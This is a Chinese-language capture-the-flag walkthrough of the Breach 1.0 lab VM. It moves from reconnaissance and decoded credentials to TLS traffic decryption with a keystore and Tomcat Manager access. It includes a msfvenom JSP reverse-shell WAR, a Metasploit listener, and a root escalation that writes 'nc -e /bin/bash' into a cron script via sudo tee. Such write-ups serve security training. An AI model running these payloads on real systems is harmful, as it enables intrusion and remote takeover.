Breach 1.0 靶机

Breach 1.0

环境配置

  • 设置 VMware 上的仅主机模式网卡,勾选 DHCP 自动分配 IP,将子网改为 192.168.110.0/24

    Breach 1.0 靶机_第1张图片

  • 将靶机和 kali 连接到仅主机网卡

信息搜集

存活检测

Breach 1.0 靶机_第2张图片

详细扫描

后台网页扫描

Breach 1.0 靶机_第3张图片

网页信息搜集

Breach 1.0 靶机_第4张图片

Breach 1.0 靶机_第5张图片

Initech被入侵,董事会投票决定引入内部的Initech网络咨询,LLP部门来协助。鉴于此次入侵事件的高知名度和几乎灾难性的损失,随后出现了许多针对该公司的攻击。Initech已委托其顶级顾问,由Bill Lumbergh、CISSP和Peter Gibbons、CjEH、SEC+、NET+、A+领导,对漏洞进行控制和分析。该公司几乎没有意识到,这次入侵并不是熟练的黑客所为,而是一名心怀不满的前雇员离职时留下的临别礼物。TOP咨询公司一直在努力遏制这一漏洞。然而,他们自己的职业道德和留下的烂摊子可能是公司垮台的原因。
  • 查看源码发现疑似密文,并且有一个 herf 链接,点击胖子图片进行跳转

    Breach 1.0 靶机_第6张图片

    Y0dkcFltSnZibk02WkdGdGJtbDBabVZsYkNSbmIyOWtkRzlpWldGbllXNW5KSFJo
    
  • md5 解密

    cGdpYmJvbnM6ZGFtbml0ZmVlbCRnb29kdG9iZWFnYW5nJHRh
    

    Breach 1.0 靶机_第7张图片

    再次解密

    pgibbons:damnitfeel$goodtobeagang$ta
    
  • 跳转的网页

    Breach 1.0 靶机_第8张图片

  • 点击 employee portal 跳转到

    Breach 1.0 靶机_第9张图片

  • 尝试使用刚刚解密出的值进行登录

    pgibbons
    damnitfeel$goodtobeagang$ta
    

    成功登录

    Breach 1.0 靶机_第10张图片

  • 依次查询过滤有用信息

    最终在邮件中的第三封邮件中发现 “秘密证书” 字样

    并带有文件

    Breach 1.0 靶机_第11张图片

  • 下载证书

    邮件上说把文件保存到这个网址

    尝试访问

    Breach 1.0 靶机_第12张图片

  • 访问网页直接下载了 index.keystore 文件

    Breach 1.0 靶机_第13张图片

  • 在 View Account 页面发现了一个流量包文件,下载

    并发现密码字样,密码为 tomcat

    Breach 1.0 靶机_第14张图片

    Breach 1.0 靶机_第15张图片

流量信息搜集

  • 使用 wireshark 打开文件,发现有许多 TLS 加密的报文

    Breach 1.0 靶机_第16张图片

  • .keystore 密钥/证书

    .keystore文件是一种用于存储密钥和证书的二进制文件格式。

    常见的TLS证书格式包括:

    1. DER格式:以.der或.crt扩展名保存的证书文件,通常包含单个X.509证书。
    2. PEM格式:以.pem或.crt扩展名保存的证书文件,它使用Base64编码,并使用"-----BEGIN CERTIFICATE-----“和”-----END CERTIFICATE-----"标记来界定证书内容。PEM格式可以包含单个或多个X.509证书。

    在Keystore中,使用Java的keytool工具可以将DER或PEM格式的证书导入到JKS或PKCS#12格式的Keystore中。

    解密:

    keytool -importkeystore -srckeystore index.keystore -destkeystore breach.p12 -deststoretype pkcs12 -srcalias tomcat
     
    -importkeystore 导出keystore
     
    -srckeystore  源keystore文件
     
    -destkeystore  导出之后的证书存放路径
     
    -deststoretype  导出keystore之后的证书类型
     
    -srcalias 源alias
    

    成功生成证书文件

    Breach 1.0 靶机_第17张图片

  • 将证书文件导入 wireshark

    Breach 1.0 靶机_第18张图片

    Breach 1.0 靶机_第19张图片

  • 查看数据包

    发现加密密文和一个网站,wireshark 已经将其解密了

    Breach 1.0 靶机_第20张图片

  • 访问网站

    被浏览器的安全措施拦截

    Breach 1.0 靶机_第21张图片

  • 使用 bp 代理,拦截,放包

    Breach 1.0 靶机_第22张图片

  • 输入 wireshark 流量包解密的账号密码

    tomcat
    Tt\5D8F(#!*u=G)4m7zB
    

    Breach 1.0 靶机_第23张图片

  • 成功登录进入Tomcat Manager 界面

    Breach 1.0 靶机_第24张图片

webshell

  • 生成 .war 木马文件

    msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.110.128 LPORT=8888 -f war > shell.war
    

    image-20231021131314929

  • 启动 msfconsole 并设置参数,开启监听

    mscconsole
    
    use exploit/multi/handler
    
    set LHOST 192.168.110.140
    set LPORT 8888
    run
    

    Breach 1.0 靶机_第25张图片

  • 上传木马文件

    Breach 1.0 靶机_第26张图片

  • 打开上传的文件

    Breach 1.0 靶机_第27张图片

  • 反弹成功

    Breach 1.0 靶机_第28张图片

提权

信息搜集

  • 尝试 sudo -l 失败

    Breach 1.0 靶机_第29张图片

  • 尝试 suid 提权失败

    Breach 1.0 靶机_第30张图片

  • 搜集系统中有用信息

    最终在 /var/www/5446 目录下发现了 php 文件,其中显示了数据库的 user 为 root,并且密码为空

    Breach 1.0 靶机_第31张图片

数据库信息搜集

  • 在 mysql 数据库的 user 表中发现了数据库用户 milton 及加密的密码

    6450d89bd3aff1d893b85d3ad65d2ec2
    

    Breach 1.0 靶机_第32张图片

  • 解密密码

    thelaststraw
    

    Breach 1.0 靶机_第33张图片

  • 查看 /etc/passwd 文件也存在该用户

    尝试用其数据库密码进行登录

    Breach 1.0 靶机_第34张图片

  • 成功登录

    Breach 1.0 靶机_第35张图片

  • 尝试切换 blumbergh 用户

    Breach 1.0 靶机_第36张图片

  • 提示需要密码

    image-20231021135953508

  • 查看用户密码文件

    Breach 1.0 靶机_第37张图片

    发现了 Bill 字样

  • 在网页信息搜集时看到过 Bill 的图片

    下载图片,检测是否有隐写信息

    strings bill.png
    

    Breach 1.0 靶机_第38张图片

  • 测试登录密码

    coffeestains
    

    image-20231021141030674

  • sudo -l 查看权限

    可以使用 tee 命令修改 tidup.sh

    Breach 1.0 靶机_第39张图片

    tee 命令可将一个文件输出的内容输入到另一个文件

    读取 a.txt 中文本内容写入 file.txt

    cat a.txt | tee file.txt
    
  • 查看 tidup.sh 权限

    image-20231021151358661

  • 查看文件

    Breach 1.0 靶机_第40张图片

    说这个脚本每三分钟自动运行一次

  • 创建一个文件写入命令 bash

    Breach 1.0 靶机_第41张图片

  • 写入

    cat shell | sudo  tee /usr/share/cleanup/tidyup.sh
    

    image-20231021154045685

  • 失败,尝试使用 nc 反弹

    nc -e /bin/bash 192.168.110.129 7777
    

    Breach 1.0 靶机_第42张图片

  • 监听,等待连接

    Breach 1.0 靶机_第43张图片

    成功 root

    Breach 1.0 靶机_第44张图片

总结

  • TLS 加密证书、.keystore 文件

  • 浏览器指明网页 https 证书不可信可使用 bp 拦截代理解决

  • Tomcat Manager 上传 msf 生成的 .war 木马实现 webshell

  • tee

你可能感兴趣的:(渗透测试,网络,服务器,运维,网络安全,笔记,linux)